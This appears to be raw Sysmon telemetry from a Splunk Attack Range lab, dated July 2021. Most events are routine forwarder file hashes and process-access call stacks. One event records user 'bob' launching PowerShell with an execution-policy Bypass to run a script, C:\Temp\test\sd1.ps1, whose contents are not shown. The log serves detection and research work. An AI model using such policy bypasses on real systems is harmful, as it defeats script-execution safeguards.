23542300x80000000000000001051169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.025{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0332463998827EF697D50867C82ACB57,SHA256=86497BC5F750A950A04539A22514A4154241C25DC2C6BEA6E2CFC1B2DB7922A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808568Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:37.805{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27D40CF324528DCC4AB430D6E64009B3,SHA256=74DF655B72EE2FEE7BFC3958576CA56987C2D938241148BA3C1C6CE8612D2AE8,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:37.729{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=90696571990FD49B63CC03F84DC8371B,SHA256=688B2919C6BDC96BC044B40AEF076F07DD9013F3D6450DA72388D2413C3E6BA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:37.040{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D46ACA775201C1D69CB1CAC3BC0E1849,SHA256=2A9D77FE5135F1F15A34B0A9DEA78986697BE4FD03B2838ADB1BB264A13F60CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808569Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:38.852{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50EE88BA2F3C85C2B0EB095F53A124E4,SHA256=BD396FFD680E45DA40047AB84B953DA6B96A742EED2E0B6EF998883A36F949A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:38.569{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=DAD2B917F1D871147CF0677C461BA738,SHA256=41E4EB8F821132DBF06364BE5F418E913C81A5E1395DC731978EB6D7E6FE6C32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:38.054{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E558C4FAFC2A90B31326C4F1E89956,SHA256=B7B35E50274AAE0DF372748D9A1C3FB769D3E2655B1FA34DEC91C759CC9E8F22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808571Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:39.868{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AE97D3A2DCBFAB4806659125DD0CF5A,SHA256=4A9EDD82A436C786120119AF9D64E57F60B36CB81C6BB8061E2A57BDE84E0B88,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:39.968{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.968{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:39.968{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.952{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.937{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.890{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.890{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:39.790{466BC892-F5F3-60EB-887D-00000000CF01}76689772C:\Windows\system32\conhost.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001051194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.690{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001051193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.690{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=A1920FFB99EBC00DBFD0FB3C2892097D,SHA256=6E4CC3AB44A361E4A311CB8C7203335C17F1816E641E41C33CD161799A2B3BE8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.676{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnk2021-07-12 07:47:36.117 23542300x80000000000000001051191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.673{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnkMD5=12125687D25AE935FA2EA7F6E92AE2DD,SHA256=B10C72356DA1CB0E8201D7086D5448DB79394E288A0313AE3922EE5DC3A36FB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:39.670{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.636{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:39.636{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.636{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:39.636{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.635{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:39.635{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001051183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.623{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 
'C:\Temp\test\sd1.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001051182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.057{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=397769639B96763842D2AFA12938822B,SHA256=1C7F09667B19CEDEB6D009E524A88773E5C988576DC0434EBA2CE67971423726,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808570Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:37.266{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57334-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808572Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:40.899{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8F410F893F0E57CE50A00F39C1D189F,SHA256=350A9D21C7F0F8D06194E46F0B037ECEBACED862EDB16922DBB143B0E49D472E,IMPHASH=00000000000000000000000000000000falsetrue 